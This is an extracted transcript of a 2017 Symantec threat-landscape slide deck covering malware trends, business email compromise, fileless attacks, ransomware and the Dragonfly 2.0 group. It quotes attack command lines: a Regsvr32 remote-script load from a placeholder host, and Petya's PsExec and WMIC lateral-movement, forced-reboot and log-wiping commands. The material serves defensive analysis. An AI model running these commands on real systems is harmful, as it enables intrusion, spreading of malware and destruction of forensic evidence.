Threat landscape update: June to September 2017

Presenter Date

Threat Landscape Q2 / 2017 Update

Asim Rab

Candid Wueest

Sept 2017

2Copyright © 2017 Symantec Corporation

General trends

Simple, but successful

o Low-tech attacks (BEC)

o Living off the land and fileless

o Emails with social engineering

Focused and selective

o More ransomware in corporations

o Selective spreading of malware

o Attacking supply chain companies


o More than 2 Million new malware variants per day

o Script malware leads to many variants

Malware statisticsRegion % of global

USA 27.26%

Japan 6.49%

China 6.04%

India 5.82%

Brazil 4.12%

Germany 3.97%

Great Britain 3.59%

Canada 2.65%

France 2.55%

Russia 2.32%

Australia 2.17%

Italy 2.03%

Mexico 1.67%

South Korea 1.34%

Turkey 1.28%

Netherlands 1.27%

Spain 1.26%

Indonesia 1.11%

Poland 1.08%

Taiwan 0.90%

0.0

10.0

20.0

30.0

40.0

50.0

60.0

70.0

80.0

90.0

100.0

January February March April May June July August

New

malware

variants per

month in

millions


Web attacks still elevated

0

200,000

400,000

600,000

800,000

1,000,000

1,200,000

1,400,000

January February March April May June July August

o Normally no 0-days exploits used

o RIG toolkit is most active

o Link spread by email or advertisement

o Sometimes infections are restricted to specific IP addresses

o Supply chain attacks increased

Web attacks blocked per day


Malicious doc containing macro with social engineering

Malicious documents still common

5

Embedded binary can be double clicked


o More than half of the malicious attachments are script files

o Macros or JavaScript are usually downloading final payload

o Most common payloads are ransomware and financial Trojans

Email

Emaile.g. invoice or receipt

Attachmente.g. JavaScript

Downloader e.g. PowerShell

Payload e.g. Ransomware

Whitepaper available


Section

Business Email Compromise (BEC)2


4.3

6.8

4.5 5.1

5.9 4.6

0.0

1.0

2.0

3.0

4.0

5.0

6.0

7.0

8.0

Jan Feb Mar Apr May Jun

BEC email received per targeted organization

Low-tech attacks: Business email compromise

o Spear-phishing taken to the next level

o Convince the company to perform a payment transaction

o Scams often use typo-squatted domains

o Some attacks change the IBAN in invoices

o Exposed losses Oct 2013 – Dec 2016 was over $5bn

o 8,000 businesses targeted monthly


Create a sense of urgency, requiring immediate action, attempting to pressure the recipient into action

BEC subject lines

Top three subjects

feature in 2/3 of all

emails

PAYMENT

URGENT

REQUEST


Section

Living off the land

3



When attackers turn what you have against youo Fewer new files on disk

o more difficult to detect attack, no IoC to share

o Use off-the-shelf tools & cloud services

o difficult to determine intent & source

o These tools are ubiquitous

o hiding in plain sight

o Finding exploitable zero-day vulnerabilities is getting more difficult

o use simple and proven methods such as email & social engineering

Living off the land

11


Multiple fileless options exist but not all are truly fileless

Fileless attacks

e.g. remote code exploits such as EternalBlue and CodeRedMemory only attacks

Fileless loadpoint

Non-PE files

Dual-use tools

Documents containing macros, PDFs with JavaScript and scripts

(VBS, JavaScript, PowerShell,…)

Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver

Using benign tools, such as PsExec, to do malicious things


Living off the land attack chain

Exploit in memorye.g. SMB EternalBlue

Email with Non-PE filee.g. document macro

Weak or stolen credentialse.g. RDP password guess

Incursion

Remote script dropper e.g. LNK with PowerShell from cloud

Memory only malwaree.g. SQL Slammer

Non-persistent

Persistent

Persistence

Fileless persistence loadpointe.g. JScript in registry

Traditional methods

Payload

Regular non-fileless payload

Non-PE file payloade.g. PowerShell script

Memory only payloade.g. Mirai DDoS

Dual-use toolse.g. netsh or PsExec.exe


o Scripts are very common, especially PowerShell

o Many script toolkits available, e.g. PS Empire

o Scripts are easy to obfuscate and difficult to detect with signatures

o Scripts are flexible and can be adapted quickly

Non-PE filesWhitepaper available


Fileless loadpoints

o Registry run key can point to a remote SCT file

o Regsvr32 will download and execute the embedded JScript

Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll

Downloder.Dromedan (40,000 detections per day)

o Embedded JScript uses WMI to execute a PowerShell payload

o Script stores encoded DLL in the registry for later use

Example: Remote SCT load

Malicious.sct file


Section

Ransomware

4



Ransomware stats

o Ransomware is still profitable and common

o Multiple self-propagating variants appeared

010,00020,00030,00040,00050,00060,00070,00080,00090,000

Ja

n-1

6

Fe

b-1

6

Ma

r-1

6

Ap

r-1

6

Ma

y-1

6

Ju

n-1

6

Ju

l-1

6

Aug-1

6

Se

p-1

6

Oct-

16

No

v-1

6

De

c-1

6

Ja

n-1

7

Fe

b-1

7

Ma

r-1

7

Ap

r-1

7

Ma

y-1

7

Ju

n-1

7

Trend Line

Other Countries

31%

United States29%

Japan9%

Italy8%

India4%

Germany4%

Netherlands3%

UK3%

Australia3%

Russia3%

Canada3%


o 42% of ransomware infections in 2017 were in enterprises o Due to WannaCry and Petya

o Attacks against cloud storage increased

Ransomware in enterprises

0

10,000

20,000

30,000

40,000

50,000

60,000

Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17

Consumer Enterprise


o 1 Billion EternalBlue infection attempts blocked

o Profit $140K, Bitcoin accounts emptied August 3rd

o Linked to Lazarus group

WannaCry

0

20000

40000

60000

80000

100000

120000


o Petya (June variant) classified as a wiper

o Semi-targeted infections through supply chain hack (MEDoc)

o Profit $10K, Bitcoin account emptied July 4th

Petya

0

20

40

60

80

100

120

140

160


o Threat is a DLL executed by rundll32.exe

o Uses recompiled version of LSADump Mimikatz to get passwords

o Uses PsExec to propagate

o \\[server_name]\admin$\perfc.dat

o psexec rundll32.exe c:\windows\perfc.dat #1 [RANDOM]

o Uses WMI to propagate if PsExec failso wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create

“%System%\rundll32.exe \“%Windows%\perfc.dat\" #1 60”

o Scheduled task to restart into the malicious MBR payloado schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%\shutdown14:42.exe /r /f" /ST

o Deletes log files to hide traceso wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:

Petya uses dual-use tools


Section

Targeted attack groups

5


o Active since December 2015 in Europe and North America

o Ongoing attacks against energy sector, mainly in Turkey and U.S.

Infiltrationo Compromised websites and spear phishing (Phishery toolkit)

o Trojanized software, using Shelter evasion framework

o Various backdoors:

Dragonfly 2.0

• Trojan.Listrix

• Trojan.Credrix

• Backdoor.Goodor

• Backdoor.Dorshell

• Trojan.Karagany.B

• Trojan.Heriplor

Slide deck available


o Uses living off the land tacticso PowerShell, PsExec, and BITSAdmin

o Phisherly toolkit became available on GitHub in 2016o Document used SMB template link to leak credentials

o Screenutil and Shelter are available online

Goalo Information stealing: passwords, documents and screenshots

o Potential for sabotage attacks

Dragonfly 2.0


o Many cases where legitimate software was compromised

o Fast and semi-targeted distribution through update process

o Trojanized updates are difficult to discovero Trusted domain, digitally signed, trusted update process,…

Examples:o MEdoc (Petya June/2017)o CCleaner (Aug/2017)o Python modules (Sept/2017)o ICS supplier (Dragonfly 2014)

Supply chain attacks increasing


o Cybercriminals are focusing on simple but effective methods

o Ransomware is still very prevalent

o Living off the land tactics are increasingly used

o Often targeted infections with limited distribution

Summary

Threat landscape update: June to September 2017

Technology

Transcript of Threat landscape update: June to September 2017